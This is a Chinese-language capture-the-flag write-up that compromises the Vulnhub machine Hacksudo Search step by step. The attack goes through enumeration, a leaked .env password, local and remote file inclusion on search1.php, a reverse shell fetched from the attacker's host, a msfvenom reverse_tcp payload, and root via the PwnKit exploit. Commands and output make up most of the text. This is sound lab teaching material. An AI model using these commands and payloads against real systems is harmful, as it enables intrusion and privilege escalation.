Hacksudo Search
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:f5:05:04 1 60 PCS Systemtechnik GmbH
192.168.56.162 08:00:27:b8:ce:1e 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.162
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.162 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-24 21:30 EDT
Nmap scan report for bogon (192.168.56.162)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 7b:44:7c:da:fb:e5:e6:1d:76:33:eb:fa:c0:dd:77:44 (RSA)
| 256 13:2d:45:07:32:83:13:eb:4e:a1:20:f4:06:ba:26:8a (ECDSA)
|_ 256 21:a1:86:47:07:1b:df:b2:70:7e:d9:30:e3:29:c2:e7 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: HacksudoSearch
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:B8:CE:1E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.71 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)
获得Shell
──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ curl http://192.168.56.162/robots.txt
/* find me * im number 1 search engine .
just joking :)
www.hacksudo.com
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ nikto -h http://192.168.56.162
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.162
+ Target Hostname: 192.168.56.162
+ Target Port: 80
+ Start Time: 2023-04-24 22:26:53 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /account/: Directory indexing found.
+ OSVDB-3092: /account/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /.env: .env file found. The .env file may contain credentials.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2023-04-24 22:27:52 (GMT-4) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
nikto发现目录/account/,该目录下虽然有众多文件,但是访问这些文件,返回均为空。
nikto另外发现了/.env,
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ curl http://192.168.56.162/.env
APP_name=HackSudoSearch
APP_ENV=local
APP_key=base64:aGFja3N1ZG8gaGVscCB5b3UgdG8gbGVhcm4gQ1RGICwgY29udGFjdCB1cyB3d3cuaGFja3N1ZG8uY29tL2NvbnRhY3QK
APP_DEBUG=false
APP_URL=http://localhost
LOG_CHANNEL=stack
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_USERNAME=hiraman
DB_PASSWORD=MyD4dSuperH3r0!
该文件包含了数据库连接用户名和密码,但是该用户名不能用于SSH
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ ssh hiraman@192.168.56.162
The authenticity of host '192.168.56.162 (192.168.56.162)' can't be established.
ED25519 key fingerprint is SHA256:dzS9ujCpu8ohIPbqCaxf4e6gi5YSgBrhAI8srwr1giU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.162' (ED25519) to the list of known hosts.
hiraman@192.168.56.162's password:
Permission denied, please try again.
hiraman@192.168.56.162's password:
──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ gobuster dir -u http://192.168.56.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.162
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,txt,bak,js,sh
[+] Timeout: 10s
===============================================================
2023/04/24 22:31:27 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/images (Status: 301) [Size: 317] [--> http://192.168.56.162/images/]
/index.php (Status: 200) [Size: 715]
/search.php (Status: 200) [Size: 165]
/submit.php (Status: 200) [Size: 165]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.162/assets/]
/account (Status: 301) [Size: 318] [--> http://192.168.56.162/account/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.162/javascript/]
/robots.txt (Status: 200) [Size: 75]
/LICENSE (Status: 200) [Size: 1074]
/search1.php (Status: 200) [Size: 2918]
Gobuster工具扫描出文件/search1.php,访问该文件,其中contact,作者给出提示,需要FUZZ参数,因此接下来用wfuzz工具进行FUZZING
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ wfuzz -c -u 'http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 288
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwd
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001129: 200 143 L 260 W 3797 Ch "me"
FUZZ出参数名称为me
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ curl http://192.168.56.162/search1.php?me=../../../../../../etc/passwd
<body style="background-color:Navy;">
<!-- find me @hacksudo.com/contact @fuzzing always best option :) -->
<font color=white>
<div class="topnav">
<a class="active" href="?find=home.php">Home</a>
<a href="?Me=about.php">About</a>
<a href="?FUZZ=contact.php">Contact</a>
<div class="search-container">
<form action="submit.php">
<input type="text" placeholder="Search.." name="search">
<button type="submit"><i class="fa fa-search"></i></button>
</form>
</div>
</div>
<div style="padding-left:16px">
<h1><font color=red>HackSudo</font> Search box</h1>
<p>JumpStation The web crawler with Google</p>
</div>
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:*:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:*:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:*:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:*:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
monali:x:1001:1001:,,,:/home/monali:/bin/bash
john:x:1002:1002:,,,:/home/john:/bin/bash
search:x:1003:1003:,,,:/home/search:/bin/bash
</form>
</font>
<font color=red><h2><marquee> <a href="https://www.hacksudo.com/">Visit --> www.hacksudo.com</marquee></h2></a>
</font>
</div>
</body>
</html>
看是否存在SSH私钥文件
http://192.168.56.162/search1.php?me=../../../../../../home/search/.ssh/id_rsa
经过测试3个普通用户均不存在ssh私钥文件。
接下来看是否有远程文件包含漏洞:
http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/test.txt
经过尝试,目标存在远程文件包含漏洞,因此在Kali linux端准备好shell.php文件,并启动http.server
访问下述URL:
http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/shell.php
在Kali linux上得到目标主机反弹回来的shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.162] 55864
Linux HacksudoSearch 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
22:00:50 up 40 min, 0 users, load average: 0.01, 1.18, 1.25
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@HacksudoSearch:/$ cd /home
cd /home
www-data@HacksudoSearch:/home$ ls -alh
ls -alh
total 24K
drwxr-xr-x 6 root root 4.0K Apr 15 2021 .
drwxr-xr-x 18 root root 4.0K Apr 11 2021 ..
drwxr-x--- 6 hacksudo hacksudo 4.0K Apr 15 2021 hacksudo
drwxr-x--- 2 john john 4.0K Apr 13 2021 john
drwxr-x--- 2 monali monali 4.0K Apr 13 2021 monali
drwxr-x--- 2 search search 4.0K Apr 15 2021 search
提权
利用msfvenom工具生成payload,将payload上传至目标主机/tmp目录,然后执行该文件
─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elf
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.230:6666
[*] Sending stage (989032 bytes) to 192.168.56.162
[*] Meterpreter session 1 opened (192.168.56.230:6666 -> 192.168.56.162:33994) at 2023-04-24 22:51:21 -0400
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.56.162 - Collecting local exploits for x86/linux...
[*] 192.168.56.162 - 167 exploit checks are being tried...
[+] 192.168.56.162 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.162 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.162 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.162 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
2 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
3 exploit/linux/local/su_login Yes The target appears to be vulnerable.
选择提权模块,然后提权
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options
Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):
Name Current Setting Required Description
---- --------------- -------- -----------
PKEXEC_PATH no The path to pkexec binary
SESSION yes The session to run this module on
WRITABLE_DIR /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 x86_64
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888
LPORT => 8888
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.56.230:8888
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.aqmsnondyug
[+] The target is vulnerable.
[*] Writing '/tmp/.esjvtiaf/vswplcef/vswplcef.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.esjvtiaf
[*] Sending stage (3020772 bytes) to 192.168.56.162
[+] Deleted /tmp/.esjvtiaf/vswplcef/vswplcef.so
[+] Deleted /tmp/.esjvtiaf/.qbbgfqf
[+] Deleted /tmp/.esjvtiaf
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.162:40940) at 2023-04-24 22:55:08 -0400
meterpreter > shell
Process 1145 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls
notes.txt
root.txt
cat notes.txt
_ _ _ _
| |__ __ _ ___| | _____ _ _ __| | ___ ___ ___ __ _ _ __ ___| |__
| '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \ / __|/ _ \/ _` | '__/ __| '_ \
| | | | (_| | (__| <\__ \ |_| | (_| | (_) | \__ \ __/ (_| | | | (__| | | |
|_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/ |___/\___|\__,_|_| \___|_| |_|
+-------------------------------------------------------------------------+
hacksudo search Box created By vishal waghmare
https://instagram.com/realvilu
try hacksudo other box
1.hacksudo 1.1
2.hacksudo 2
3.hacksudo 3
4.hacksudo aliens
+----------------------------------+
this box name is hacksudo search.
it's my pleasure to create such box .
+-----------------------------------+
if any query or want any kinda support you can contact us
email: info@hacksudo.com
visal@hacksudo.com
web : www.hacksudo.com
+----------------------------+
hacksudo search vulnerability:
1. LFI ssh log poisioning / RFI on search1.php
2. after geting shell or you can do ls -la in /var/www/html
in .env there is password hint
3. users are 3 to 4 so confused? do ssh one by one
else do hydra with given password (MyD4dSuperH3r0!)
4. hacksudo ssh login done now do privileged escalation , there is searchinstall.c
searchinstall file which one have SUID permision and by read searchinstall.c
there you can read install command which is triggerd . so try path veriable
and you will get root access
+++------rooted------------+++
yes you roted box thats why you read this
btw create your writeup how you solve this box and send to me
i love to read your way how you solve this box
+++---------+++-----------+++
Signed out
#vishal waghmare
cat root.txt
_ _ _ ____ _
| |__ __ _ ___| | _____ _ _ __| | ___ / ___| ___ __ _ _ __ ___| |__
| '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \ \___ \ / _ \/ _` | '__/ __| '_ \
| | | | (_| | (__| <\__ \ |_| | (_| | (_) | ___) | __/ (_| | | | (__| | | |
|_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/ |____/ \___|\__,_|_| \___|_| |_|
You Successfully Hackudo search box
rooted!!!
flag={9fb4c0afce26929041427c935c6e0879}